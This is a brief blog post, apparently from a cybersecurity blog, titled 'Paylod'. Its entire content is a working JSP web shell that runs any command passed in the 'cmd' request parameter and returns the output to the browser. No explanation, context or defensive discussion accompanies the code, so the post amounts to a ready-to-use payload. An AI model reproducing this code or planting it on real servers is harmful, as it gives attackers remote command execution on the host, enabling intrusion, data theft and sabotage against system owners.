Skip to main content

Command Palette

Search for a command to run...

Paylod

Updated
1 min readView as Markdown
A
I write about cybersecurity, and simple tech guides.

<%@ page import="java.io.*" %>

<%

String cmd = request.getParameter("cmd");

if (cmd != null) {

Process p = Runtime.getRuntime().exec(cmd);

BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));

String line;

while ((line = r.readLine()) != null) {

out.println(line + "
");

}

}

%>

1 views